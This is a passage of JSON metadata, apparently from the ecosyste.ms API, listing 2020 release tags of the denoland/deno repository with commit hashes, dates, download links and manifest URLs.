s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F